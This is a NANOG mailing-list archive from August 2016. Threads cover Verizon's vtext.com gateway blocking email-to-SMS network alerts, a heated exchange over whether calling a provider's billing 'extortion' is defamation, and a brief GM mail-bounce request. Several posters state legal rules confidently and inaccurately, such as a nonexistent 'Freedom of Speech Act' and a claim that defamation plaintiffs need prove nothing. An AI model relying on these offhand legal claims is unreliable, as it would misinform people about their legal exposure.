> > Not to mention that accusing someone of a crime (extortion), in public (in this context I would argue that this is public, especially as the term 'community' was used in the allegation) is a pretty serious thing. > > Anne P. Mitchell, > Attorney at Law > Legislative Consultant > CEO/President, > SuretyMail Email Reputation Certification and Inbox Delivery Assistance > http://www.SuretyMail.com/ > http://www.SuretyMail.eu/ > > Available for consultations by special arrangement. > > Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) > Member, California Bar Cyberspace Law Committee > Member, Colorado Cybersecurity Consortium > Member, Asilomar Microcomputer Workshop Committee > Ret. Professor of Law, Lincoln Law School of San Jose > Ret. Chair, Asilomar Microcomputer Workshop > amitchell at isipp.com | @AnnePMitchell > Facebook/AnnePMitchell | LinkedIn/in/annemitchell > > From sryan at arbor.net Tue Aug 16 23:17:02 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Tue, 16 Aug 2016 23:17:02 +0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com>, Message-ID: I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free service for anything critical is asking for trouble. Sent from my Verizon, Samsung Galaxy smartphone -------- Original message -------- From: Josh Luthman Date: 8/16/16 6:09 PM (GMT-05:00) To: Mike Cc: NANOG list Subject: Re: Email to text - vtext.com blacklisting ip If it's critical I'd suggest a service than can depended on... Josh Luthman Office: 937-552-2340 Direct: 937-552-2343 1100 Wayne St Suite 1337 Troy, OH 45373 On Aug 16, 2016 5:45 PM, "Mike" wrote: > Hi, > > > I have a server that monitors my network and issues text messages if > there are events of note that require human intervention. 
There is some > process filtering that ensures it also is not able to issue more than 1 > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > messages all screaming the sky is falling when things are not going well. > Recently however, this server is no longer able to deliver messages to > vtext.com - it gets nothing but 554 errors: > > > telnet 69.78.67.53 25 > Trying 69.78.67.53... > Connected to 69.78.67.53. > Escape character is '^]'. > 554 txslspamp10.vtext.com > Connection closed by foreign host. > > Granted on some days during challenging times it can send 30 or 40 > messages before we get to it and get it squelched / silenced, but it's > otherwise reasonably well behaved IMHO and I don't think we are any heavy > volume sender. So I am trying to figure out why it's blacklisted then and > am rolling snake eyes. If anyone who is an admin for verizon or who has > any insight to share I'd certainly appreciate it. Email to text is a > critical function we depend on. > > > Thank you. > > > From Sam at SanDiegoBroadband.com Tue Aug 16 23:33:01 2016 From: Sam at SanDiegoBroadband.com (Sam Norris) Date: Tue, 16 Aug 2016 16:33:01 -0700 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com>, Message-ID: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Same boat... We are sending messages to PHONENUMBER at vtext.com and getting bouncebacks or lost items. I assume its because some limits are now being put into place. We are a Verizon subscriber so I am paying, it is not a free service. But .... I am totally up for paid services if you can recommend some that will reliably get us texts to our verizon phones. Sam > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > Sent: Tuesday, August 16, 2016 4:17 PM > To: Josh Luthman; Mike > Cc: NANOG list > Subject: RE: Email to text - vtext.com blacklisting ip > > I agree. 
Pay Pager duty or a SMS gateway with a SLA. Relying on the free service > for anything critical is asking for trouble. > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > -------- Original message -------- > From: Josh Luthman > Date: 8/16/16 6:09 PM (GMT-05:00) > To: Mike > Cc: NANOG list > Subject: Re: Email to text - vtext.com blacklisting ip > > If it's critical I'd suggest a service than can depended on... > > Josh Luthman > Office: 937-552-2340 > Direct: 937-552-2343 > 1100 Wayne St > Suite 1337 > Troy, OH 45373 > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > Hi, > > > > > > I have a server that monitors my network and issues text messages if > > there are events of note that require human intervention. There is some > > process filtering that ensures it also is not able to issue more than 1 > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > messages all screaming the sky is falling when things are not going well. > > Recently however, this server is no longer able to deliver messages to > > vtext.com - it gets nothing but 554 errors: > > > > > > telnet 69.78.67.53 25 > > Trying 69.78.67.53... > > Connected to 69.78.67.53. > > Escape character is '^]'. > > 554 txslspamp10.vtext.com > > Connection closed by foreign host. > > > > Granted on some days during challenging times it can send 30 or 40 > > messages before we get to it and get it squelched / silenced, but it's > > otherwise reasonably well behaved IMHO and I don't think we are any heavy > > volume sender. So I am trying to figure out why it's blacklisted then and > > am rolling snake eyes. If anyone who is an admin for verizon or who has > > any insight to share I'd certainly appreciate it. Email to text is a > > critical function we depend on. > > > > > > Thank you. 
> > > > > > From josh at imaginenetworksllc.com Tue Aug 16 23:39:26 2016 From: josh at imaginenetworksllc.com (Josh Luthman) Date: Tue, 16 Aug 2016 19:39:26 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: Personally PagerDuty and their API. Serious stuff is a phone call (something I rarely get after hours). Josh Luthman Office: 937-552-2340 Direct: 937-552-2343 1100 Wayne St Suite 1337 Troy, OH 45373 On Aug 16, 2016 7:34 PM, "Sam Norris" wrote: > Same boat... We are sending messages to PHONENUMBER at vtext.com and getting > bouncebacks or lost items. I assume its because some limits are now being > put > into place. We are a Verizon subscriber so I am paying, it is not a free > service. But .... I am totally up for paid services if you can recommend > some > that will reliably get us texts to our verizon phones. > > Sam > > > > -----Original Message----- > > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > > Sent: Tuesday, August 16, 2016 4:17 PM > > To: Josh Luthman; Mike > > Cc: NANOG list > > Subject: RE: Email to text - vtext.com blacklisting ip > > > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free > service > > for anything critical is asking for trouble. > > > > > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > > > > -------- Original message -------- > > From: Josh Luthman > > Date: 8/16/16 6:09 PM (GMT-05:00) > > To: Mike > > Cc: NANOG list > > Subject: Re: Email to text - vtext.com blacklisting ip > > > > If it's critical I'd suggest a service than can depended on... 
> > > > Josh Luthman > > Office: 937-552-2340 > > Direct: 937-552-2343 > > 1100 Wayne St > > Suite 1337 > > Troy, OH 45373 > > > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > > > Hi, > > > > > > > > > I have a server that monitors my network and issues text messages > if > > > there are events of note that require human intervention. There is some > > > process filtering that ensures it also is not able to issue more than 1 > > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > > messages all screaming the sky is falling when things are not going > well. > > > Recently however, this server is no longer able to deliver messages to > > > vtext.com - it gets nothing but 554 errors: > > > > > > > > > telnet 69.78.67.53 25 > > > Trying 69.78.67.53... > > > Connected to 69.78.67.53. > > > Escape character is '^]'. > > > 554 txslspamp10.vtext.com > > > Connection closed by foreign host. > > > > > > Granted on some days during challenging times it can send 30 or 40 > > > messages before we get to it and get it squelched / silenced, but it's > > > otherwise reasonably well behaved IMHO and I don't think we are any > heavy > > > volume sender. So I am trying to figure out why it's blacklisted then > and > > > am rolling snake eyes. If anyone who is an admin for verizon or who > has > > > any insight to share I'd certainly appreciate it. Email to text is a > > > critical function we depend on. > > > > > > > > > Thank you. > > > > > > > > > > > From jhellenthal at dataix.net Tue Aug 16 23:51:37 2016 From: jhellenthal at dataix.net (J. 
Hellenthal) Date: Tue, 16 Aug 2016 18:51:37 -0500 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: Unfortunately I am not in the same boat here in Milwaukee WI all messages to vtext.com personal and business on greater that four subnets that we own are being delivered. I would suspect what you are seeing may be a local problem to be resolved soon. -- Onward!, Jason Hellenthal, Systems & Network Admin, Mobile: 0x9CA0BD58, JJH48-ARIN On Aug 16, 2016, at 18:33, Sam Norris wrote: Same boat... We are sending messages to PHONENUMBER at vtext.com and getting bouncebacks or lost items. I assume its because some limits are now being put into place. We are a Verizon subscriber so I am paying, it is not a free service. But .... I am totally up for paid services if you can recommend some that will reliably get us texts to our verizon phones. Sam > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > Sent: Tuesday, August 16, 2016 4:17 PM > To: Josh Luthman; Mike > Cc: NANOG list > Subject: RE: Email to text - vtext.com blacklisting ip > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free service > for anything critical is asking for trouble. > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > -------- Original message -------- > From: Josh Luthman > Date: 8/16/16 6:09 PM (GMT-05:00) > To: Mike > Cc: NANOG list > Subject: Re: Email to text - vtext.com blacklisting ip > > If it's critical I'd suggest a service than can depended on... 
> > Josh Luthman > Office: 937-552-2340 > Direct: 937-552-2343 > 1100 Wayne St > Suite 1337 > Troy, OH 45373 > >> On Aug 16, 2016 5:45 PM, "Mike" wrote: >> >> Hi, >> >> >> I have a server that monitors my network and issues text messages if >> there are events of note that require human intervention. There is some >> process filtering that ensures it also is not able to issue more than 1 >> alert maximum per 5 minutes, to ensure it doesn't flood pagers with >> messages all screaming the sky is falling when things are not going well. >> Recently however, this server is no longer able to deliver messages to >> vtext.com - it gets nothing but 554 errors: >> >> >> telnet 69.78.67.53 25 >> Trying 69.78.67.53... >> Connected to 69.78.67.53. >> Escape character is '^]'. >> 554 txslspamp10.vtext.com >> Connection closed by foreign host. >> >> Granted on some days during challenging times it can send 30 or 40 >> messages before we get to it and get it squelched / silenced, but it's >> otherwise reasonably well behaved IMHO and I don't think we are any heavy >> volume sender. So I am trying to figure out why it's blacklisted then and >> am rolling snake eyes. If anyone who is an admin for verizon or who has >> any insight to share I'd certainly appreciate it. Email to text is a >> critical function we depend on. >> >> >> Thank you. From sethm at rollernet.us Wed Aug 17 00:09:42 2016 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 16 Aug 2016 17:09:42 -0700 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: <361dcaa0-fc24-8e00-3705-a8144d8b9816@rollernet.us> On 8/16/16 16:33, Sam Norris wrote: > We are a Verizon subscriber so I am paying, it is not a free > service. 
Verizon does have an enterprise messaging service with API hooks, such as using SNPP instead of email-to-sms. ~Seth From mel at beckman.org Wed Aug 17 01:24:43 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 17 Aug 2016 01:24:43 +0000 Subject: Zayo Extortion In-Reply-To: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com>, <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Message-ID: <98886F8D-BB5A-4852-B32B-60D279D9F858@beckman.org> Jon, You're mistaken. This has nothing to do with being or not being an FCC-controlled medium. It has to do with published statements that may not be true -- which are classified as libel, not slander (slander is spoken, libel is written). If you post it in a mailing list, or on Facebook, it's legally considered published, as long as one other person not party to the matter can view it. You're also mistaken about how the law works. The person making the assertion has the burden of proof. If you say someone is an extortionist, you'd better be able to prove it. All the plaintiff has to do is say "Your honor, I've been libeled, and here are my damages. Please make the defendant compensate me." You will be subpoenaed, and at court the judge will turn to you and say "Where is the proof of your claims?" If you can't deliver, the judgement will go against you. The plaintiff doesn't have to prove a thing. In fact, his claim will automatically be accepted and processed by the legal system up until you appear in court. The cost for you before that point could be thousands of dollars. If you don't show up for court, you automatically lose. -mel beckman -mel beckman On Aug 16, 2016, at 4:12 PM, Jonathan Hall wrote: Excuse me for chiming in, here? But, if I'm not mistaken (don't worry, I'm not) - this doesn't count as "slander" in any way, shape or form.
This mail thread is not any kind of valid FCC controlled or public communications device, as the internet was actually excluded from the public communications device list under the Freedom of Speech Act in? Was it, 1996? Which means, "slander" can't be called in this case. You could argue that it can, but you'd lose in court in the long run. If you're aiming for the defamation card? That's a very difficult one to prove. I'd counter the argument in a court room by asking the judge to prove the plaintiff is NOT an extortionist scum bag. It certainly works both ways. And either way, defamation requires some form of punitive damage be proven in order to actually win that case. Are you saying that the company he is referencing has some way to claim and directly correlate a loss of income or potential loss of income, either present and/or future, due to the comment made on a mail group? I'd love to see that quantification on paper... None the less, regardless of what one accuses or says on the internet, the usage of the word "extortion" is quite open for interpretation with regards to context, and making such a statement does not qualify for slander nor defamation. He could feel he's being extorted, in which case exasperating his opinion publicly is no less legal than me telling you that I don't really think you're a good lawyer. Good luck trying to play that card in a courtroom. Short and simple: One could threaten to sue over it, and one could even try. Personally, I'd turn that court room in to a circus act if someone tried. I'd most likely get fined in contempt a few times, but at least even the judge will go home laughing. :) J On 16 Aug 2016, at 16:45, Anne Mitchell wrote: to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us."
All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." [...] At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details Are you talking with your SP's lawyers without your a legal team of your own present and advising you? I think one of the first things they should tell you is not to discuss pending disputes in public. Time to get a consultation with your own Lawyers to assist with billing dispute resolution, ASAP. Not to mention that accusing someone of a crime (extortion), in public (in this context I would argue that this is public, especially as the term 'community' was used in the allegation) is a pretty serious thing. Anne P. Mitchell, Attorney at Law Legislative Consultant CEO/President, SuretyMail Email Reputation Certification and Inbox Delivery Assistance http://www.SuretyMail.com/ http://www.SuretyMail.eu/ Available for consultations by special arrangement. Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) Member, California Bar Cyberspace Law Committee Member, Colorado Cybersecurity Consortium Member, Asilomar Microcomputer Workshop Committee Ret. Professor of Law, Lincoln Law School of San Jose Ret. 
Chair, Asilomar Microcomputer Workshop amitchell at isipp.com | @AnnePMitchell Facebook/AnnePMitchell | LinkedIn/in/annemitchell From mel at beckman.org Wed Aug 17 01:28:27 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 17 Aug 2016 01:28:27 +0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <361dcaa0-fc24-8e00-3705-a8144d8b9816@rollernet.us> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>, <361dcaa0-fc24-8e00-3705-a8144d8b9816@rollernet.us> Message-ID: <0F6FF761-4013-4A99-980D-EEB24F500654@beckman.org> It's worth looking at the $40 Adafruit FONA cellular modem with inexpensive Ting month-to-month cellular service. We've been using it and it's great! I'm happy to share my simple Raspberry Pi serial port glue code that connects to Intermapper's paging interface via a local web service. Add a GPS board and you can make it double as a GPS-based time server, since FONA will extract time and latlong from GPS and make it accessible via the serial port. -mel beckman -mel beckman > On Aug 16, 2016, at 5:10 PM, Seth Mattinen wrote: > >> On 8/16/16 16:33, Sam Norris wrote: >> We are a Verizon subscriber so I am paying, it is not a free >> service. > > > Verizon does have an enterprise messaging service with API hooks, such as using SNPP instead of email-to-sms. > > ~Seth From bill at herrin.us Wed Aug 17 02:13:36 2016 From: bill at herrin.us (William Herrin) Date: Tue, 16 Aug 2016 22:13:36 -0400 Subject: Zayo Extortion In-Reply-To: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Message-ID: On Tue, Aug 16, 2016 at 7:11 PM, Jonathan Hall wrote: > if I'm not mistaken (don't worry, I'm not) - this doesn't count > as "slander" in any way, shape or form. Jonathan, Technically you're right, but not for the reason you think. Slander is verbal defamation.
Libel is written defamation. The original poster has potentially exposed himself to a libel suit. > This mail thread is not any kind of valid FCC controlled or public > communications device, as the internet was actually excluded from > the public communications device list under the Freedom of Speech > Act in? Was it, 1996? Which means, "slander" can't be called in > this case. You could argue that it can, but you'd lose in court in the long run. There is no such thing as the "Freedom of Speech Act" in 1996 or any other year, and the FCC does not have the authority to nor has it involved itself in the regulation of speech in any medium. > If you're aiming for the defamation card? That's a very difficult one to prove. It's actually very, very simple. Did the defendant allege one or more facts about the plaintiff? Did the alleged facts injure the plaintiff's reputation? Did the defendant prove that the alleged facts are true? Yes, Yes, No = liable for cash damages. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From johnl at iecc.com Wed Aug 17 03:51:35 2016 From: johnl at iecc.com (John Levine) Date: 17 Aug 2016 03:51:35 -0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: Message-ID: <20160817035135.13219.qmail@ary.lan> In article you write: >If it's critical I'd suggest a service than can depended on... Pretty much any VoIP provider has an API you can use to send SMS for 5c each or less. Or if you're worried about your upstream connection dying, the cheap GSM modem is a good option. R's, John From paul at blacknight.com Tue Aug 16 20:44:19 2016 From: paul at blacknight.com (Paul Kelly :: Blacknight) Date: Tue, 16 Aug 2016 20:44:19 +0000 Subject: gm.com / opel.com Message-ID: <9D4F6632-A7F8-4046-9CE4-BF297229E4D1@blacknight.com> Hi there, Could someone who looks after the email for General Motors please contact me off list?
Some of our customers are experiencing bounce backs sending you emails and it looks like it's DNS related.

Thanks,

Paul

Paul Kelly
CTO
Blacknight Internet Solutions Limited
Cloud Hosting, Colocation, Dedicated servers, IP Transit Services
ISO 27001:2013 Certified
Tel: +353(0)599183072
Lo-call: 1850 929 929
DDI: +353 (0) 59 9183091
Skype: flamegrill
e-mail: paul at blacknight.com
web: http://www.blacknight.com

Blacknight Internet Solutions Ltd, Unit 12A,Barrowside Business Park, Sleaty Road, Graiguecullen, Carlow, Ireland.
Company No.: 370845

From sfischer1967 at gmail.com Wed Aug 17 01:42:52 2016
From: sfischer1967 at gmail.com (Steven Fischer)
Date: Tue, 16 Aug 2016 21:42:52 -0400
Subject: Zayo Extortion
In-Reply-To: <98886F8D-BB5A-4852-B32B-60D279D9F858@beckman.org>
References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> <98886F8D-BB5A-4852-B32B-60D279D9F858@beckman.org>
Message-ID:

For the record:

Extortion(n) Law. *the crime of obtaining money or some other thing of value by the abuse of one's office or authority.*

Not sure if (according to the provided account) a service provider threatening to disable a critical business service unless rendered a sum of money the service provider cannot prove they are owed qualifies as extortion, but from the definition I found at dictionary.com, it certainly seems to be in that general neighborhood.

On Tue, Aug 16, 2016 at 9:24 PM, Mel Beckman wrote:
> Jon,
>
> You're mistaken. This has nothing to do with being or not being an
> FCC-controlled medium. It has to do with published statements that may not
> be true -- which are classified as libel, not slander (slander is spoken,
> libel is written). If you post it in a mailing list, or on Facebook, it's
> legally considered published, as long as one other person not party to the
> matter can view it.
>
> You're also mistaken about how the law works. The person making the
> assertion has the burden of proof.
If you say someone is an extortionist,
> you'd better be able to prove it. All the plaintiff has to do is say "Your
> honor, I've been libeled, and here are my damages. Please make the
> defendant compensate me." You will be subpoenaed, and at court the judge
> will turn to you and say "Where is the proof of your claims?" If you can't
> deliver, the judgement will go against you.
>
> The plaintiff doesn't have to prove a thing. In fact, his claim will
> automatically be accepted and processed by the legal system up until you
> appear in court. The cost for you before that point could be thousands of
> dollars. If you don't show up for court, you automatically lose.
>
> -mel beckman
>
> -mel beckman
>
> On Aug 16, 2016, at 4:12 PM, Jonathan Hall hall at futuresouth.us>> wrote:
>
> Excuse me for chiming in, here? But, if I'm not mistaken (don't worry, I'm
> not) - this doesn't count as "slander" in any way, shape or form. This mail
> thread is not any kind of valid FCC controlled or public communications
> device, as the internet was actually excluded from the public
> communications device list under the Freedom of Speech Act in? Was it,
> 1996? Which means, "slander" can't be called in this case. You could argue
> that it can, but you'd lose in court in the long run.
>
> If you're aiming for the defamation card? That's a very difficult one to
> prove. I'd counter the argument in a court room by asking the judge to
> prove the plaintiff is NOT an extortionist scum bag. It certainly works
> both ways. And either way, defamation requires some form of punitive damage
> be proven in order to actually win that case. Are you saying that the
> company he is referencing has some way to claim and directly correlate a
> loss of income or potential loss of income, either present and/or future,
> due to the comment made on a mail group? I'd love to see that
> quantification on paper...
>
> None the less, regardless of what one accuses or says on the internet, the
> usage of the word "extortion" is quite open for interpretation with regards
> to context, and making such a statement does not qualify for slander nor
> defamation. He could feel he's being extorted, in which case exasperating
> his opinion publicly is no less legal than me telling you that I don't
> really think you're a good lawyer.
>
> Good luck trying to play that card in a courtroom.
>
> Short and simple: One could threaten to sue over it, and one could even
> try. Personally, I'd turn that court room in to a circus act if someone
> tried. I'd most likely get fined in contempt a few times, but at least even
> the judge will go home laughing. :)
>
> J
>
> On 16 Aug 2016, at 16:45, Anne Mitchell itchell at isipp.com>> wrote:
>
>
> to say "our accounting system does not track invoice details -- it only
> shows the total amount due so your numbers mean nothing to us."
> All the while they relentlessly levied disconnect threats with short
> timelines such as: "if you don't pay us $128,000 by this Friday,
> we will shut your operation down."
> [...]
> At one point their lawyers and accounting people had the nerve to say "our
> accounting system does not track invoice details
>
> Are you talking with your SP's lawyers without your a legal team of
> your own present and advising you?
> I think one of the first things they should tell you is not to discuss
> pending disputes in public. Time to get
> a consultation with your own Lawyers to assist with billing dispute
> resolution, ASAP.
>
> Not to mention that accusing someone of a crime (extortion), in public (in
> this context I would argue that this is public, especially as the term
> 'community' was used in the allegation) is a pretty serious thing.
>
> Anne P.
Mitchell,
> Attorney at Law
> Legislative Consultant
> CEO/President,
> SuretyMail Email Reputation Certification and Inbox Delivery Assistance
> http://www.SuretyMail.com/
> http://www.SuretyMail.eu/
>
> Available for consultations by special arrangement.
>
> Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law)
> Member, California Bar Cyberspace Law Committee
> Member, Colorado Cybersecurity Consortium
> Member, Asilomar Microcomputer Workshop Committee
> Ret. Professor of Law, Lincoln Law School of San Jose
> Ret. Chair, Asilomar Microcomputer Workshop
> amitchell at isipp.com | @AnnePMitchell
> Facebook/AnnePMitchell | LinkedIn/in/annemitchell
>
>
>
>

--
To him who is able to keep you from falling and to present you before his glorious presence without fault and with great joy

From larrysheldon at cox.net Wed Aug 17 05:03:11 2016
From: larrysheldon at cox.net (Larry Sheldon)
Date: Wed, 17 Aug 2016 00:03:11 -0500
Subject: Zayo Extortion
In-Reply-To:
References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us>
Message-ID:

On 8/16/2016 21:13, William Herrin wrote:
> On Tue, Aug 16, 2016 at 7:11 PM, Jonathan Hall wrote:
>> if I'm not mistaken (don't worry, I'm not) - this doesn't count
>> as "slander" in any way, shape or form.
>
> Jonathan,
>
> Technically you're right, but not for the reason you think. Slander is
> verbal defamation. Libel is written defamation. The original poster
> has potentially exposed himself to a libel suit.

But what are the BGP implications?

--
"Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid."
--Albert Einstein

From Larry's Cox account.
From jam at zoidtechnologies.com Wed Aug 17 05:18:03 2016
From: jam at zoidtechnologies.com (Jeff)
Date: Wed, 17 Aug 2016 01:18:03 -0400
Subject: Email to text - vtext.com blacklisting ip
In-Reply-To: <20160817035135.13219.qmail@ary.lan>
References: <20160817035135.13219.qmail@ary.lan>
Message-ID: <57B3F38B.8090104@zoidtechnologies.com>

greetings,

On 08/16/2016 11:51 PM, John Levine wrote:
> In article you write:
>> If it's critical I'd suggest a service than can depended on...
>
> Pretty much any VoIP provider has an API you can use to send SMS for
> 5c each or less. Or if you're worried about your upstream connection
> dying, the cheap GSM modem is a good option.
>
> R's,
> John
>

honestly, if the backhauls to your NOC go down, you will not be able to send email-to-sms messages at all. a dial-up solution with a fee is the best option, imho.

also best to use a 'collapsible rover' to keep pages to a minimum ;)

(with a proper nod to the internet of 1996)

regards,
J

From dovid at telecurve.com Wed Aug 17 09:31:37 2016
From: dovid at telecurve.com (Dovid Bender)
Date: Wed, 17 Aug 2016 05:31:37 -0400
Subject: Email to text - vtext.com blacklisting ip
In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>
References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>
Message-ID:

We use Zang.io and are very happy. Be careful when using long codes (10 digit numbers) as if you send too many messages out in a day (500+) the larger carriers such as Verizon will start blocking you. As Jeff mentioned if your monitoring tool is onsite and the internet goes down then it's worthless. In our case it's in another DC so if everything goes down we still get alerts. You can also try twilio and telnyx.

On Tue, Aug 16, 2016 at 7:33 PM, Sam Norris wrote:
> Same boat... We are sending messages to PHONENUMBER at vtext.com and getting
> bouncebacks or lost items.
I assume its because some limits are now being
> put
> into place. We are a Verizon subscriber so I am paying, it is not a free
> service. But .... I am totally up for paid services if you can recommend
> some
> that will reliably get us texts to our verizon phones.
>
> Sam
>
>
> > -----Original Message-----
> > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer
> > Sent: Tuesday, August 16, 2016 4:17 PM
> > To: Josh Luthman; Mike
> > Cc: NANOG list
> > Subject: RE: Email to text - vtext.com blacklisting ip
> >
> > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free
> service
> > for anything critical is asking for trouble.
> >
> >
> >
> > Sent from my Verizon, Samsung Galaxy smartphone
> >
> >
> > -------- Original message --------
> > From: Josh Luthman
> > Date: 8/16/16 6:09 PM (GMT-05:00)
> > To: Mike
> > Cc: NANOG list
> > Subject: Re: Email to text - vtext.com blacklisting ip
> >
> > If it's critical I'd suggest a service than can depended on...
> >
> > Josh Luthman
> > Office: 937-552-2340
> > Direct: 937-552-2343
> > 1100 Wayne St
> > Suite 1337
> > Troy, OH 45373
> >
> > On Aug 16, 2016 5:45 PM, "Mike" wrote:
> >
> > > Hi,
> > >
> > >
> > > I have a server that monitors my network and issues text messages
> if
> > > there are events of note that require human intervention. There is some
> > > process filtering that ensures it also is not able to issue more than 1
> > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with
> > > messages all screaming the sky is falling when things are not going
> well.
> > > Recently however, this server is no longer able to deliver messages to
> > > vtext.com - it gets nothing but 554 errors:
> > >
> > >
> > > telnet 69.78.67.53 25
> > > Trying 69.78.67.53...
> > > Connected to 69.78.67.53.
> > > Escape character is '^]'.
> > > 554 txslspamp10.vtext.com
> > > Connection closed by foreign host.
> > >
> > > Granted on some days during challenging times it can send 30 or 40
> > > messages before we get to it and get it squelched / silenced, but it's
> > > otherwise reasonably well behaved IMHO and I don't think we are any heavy
> > > volume sender. So I am trying to figure out why it's blacklisted then and
> > > am rolling snake eyes. If anyone who is an admin for verizon or who has
> > > any insight to share I'd certainly appreciate it. Email to text is a
> > > critical function we depend on.
> > >
> > >
> > > Thank you.
> > >
> > >
> > >
> >

From Valdis.Kletnieks at vt.edu Wed Aug 17 13:01:57 2016
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 17 Aug 2016 09:01:57 -0400
Subject: Zayo Extortion
In-Reply-To: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us>
References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us>
Message-ID: <56221.1471438917@turing-police.cc.vt.edu>

On Wed, 17 Aug 2016 01:11:09 +0200, Jonathan Hall said:

> And either way, defamation requires some form of punitive damage be proven in
> order to actually win that case.

In addition to the other things already pointed out, punitive damage doesn't need to be proven. *Actual* damages have to be proven. Punitive damages are damages added as punishment, to make sure the responsible party learned their lesson.

So for instance, if a corporation's negligence results in a worker's death, his family may be awarded $5M in actual damages for the loss of their loved one - and then another $20 million in punitive damages, to make the corporation (and possibly the industry segment as a whole) take notice that sort of negligent behavior will not be tolerated....

From littlefishguy at gmail.com Wed Aug 17 14:46:56 2016
From: littlefishguy at gmail.com (Scott Fisher)
Date: Wed, 17 Aug 2016 10:46:56 -0400
Subject: Email to text - vtext.com blacklisting ip
In-Reply-To:
References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>
Message-ID:

This subject pops up every 6 months and it's a problem that can be solved 100 ways. One way we did it at Team Cymru was install a foxbox sms gateway in our datacenter. It was a pain to get working, (mainly due to some miscommunication with the Italian support team), but once we got past a few problems it works flawlessly for all alerts. If alerts are unack'd for a specific amount of time, escalation alerts go out via email-to-sms AND SMS to a broader group to ensure someone gets the message.

Thanks,
Scott

On Wed, Aug 17, 2016 at 5:31 AM, Dovid Bender wrote:

> We use Zang.io and are very happy. Be careful when using long codes (10
> digit numbers) as if you send too many messages out in a day (500+) the
> larger carriers such as Verizon will start blocking you. As Jeff mentioned
> if your monitoring tool is onsite and the internet goes down then it's
> worthless. In our case it's in another DC so if everything goes down we
> still get alerts. You can also try twilio and telnyx.
>
>
> On Tue, Aug 16, 2016 at 7:33 PM, Sam Norris
> wrote:
>
> > Same boat... We are sending messages to PHONENUMBER at vtext.com and
> getting
> > bouncebacks or lost items. I assume its because some limits are now
> being
> > put
> > into place. We are a Verizon subscriber so I am paying, it is not a free
> > service. But .... I am totally up for paid services if you can recommend
> > some
> > that will reliably get us texts to our verizon phones.
> >
> > Sam

--
